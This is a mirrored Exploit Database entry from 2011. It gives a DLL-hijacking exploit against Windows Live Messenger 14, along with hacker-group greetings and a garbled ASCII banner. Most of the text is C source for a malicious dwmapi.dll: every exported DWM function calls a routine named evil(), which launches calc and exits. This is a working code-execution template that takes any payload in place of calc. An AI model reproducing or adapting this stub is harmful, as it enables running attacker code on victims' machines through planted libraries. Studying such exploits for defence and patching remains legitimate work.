Microsoft Windows Live Messenger 14 – ‘dwmapi.dll’ DLL Loading Arbitrary Code Execution

• Exploit Database
• 104 阅读

• 作者： Kalashinkov3
  日期： 2011-05-31
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35809/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88

  // source: https://www.securityfocus.com/bid/48055/info   Microsoft Windows Live Messenger is prone to a vulnerability that lets attackers execute arbitrary code.   An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.   1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&apos; \__/&apos;__<code>\/\ \__/&apos;__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /&apos; _ <code>\ \/\ \/_/_\_<_/&apos;___\ \ \/\ \ \ \ \/</code>&apos;__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: 1337day.com0 1[+] Support e-mail: submit[at]1337day.com1 00 1 #########################################1 0 I&apos;m kalashinkov3 member from Inj3ct0r Team1 1 #########################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1   ######################################################### # Title : Msn Live Messenger14.0=>Plus! DLL Hijacking Exploit (dwmapi.dll) # Author: Kalashinkov3 # Home : 13000/ ALGERIA # Email : kalashinkov3[at]Hotmail[dot]Fr # Date : 31/05/2011 # Category: Local Exploit # Tested on: [Windows Xp Sp3 Fr] #########################################################   # File Vulnerable: - msnmsgr.exe     # Vulnerable extensions:   - .plsk   " Vulnerable Dll&apos;s:   dwmapi.dll   ./   #include <windows.h> #define DLLIMPORT _declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }   int evil() { WinExec("calc", 0); exit(0); return 0; }     ^_^ GOOD LUCK ALL :)   + Greets To==================================================================+ + BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 + ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com + andhrahackers.com, all Algerians Hacker&apos;S ;) & 1337day.com/team+ # All My Friends # + =============================================================================+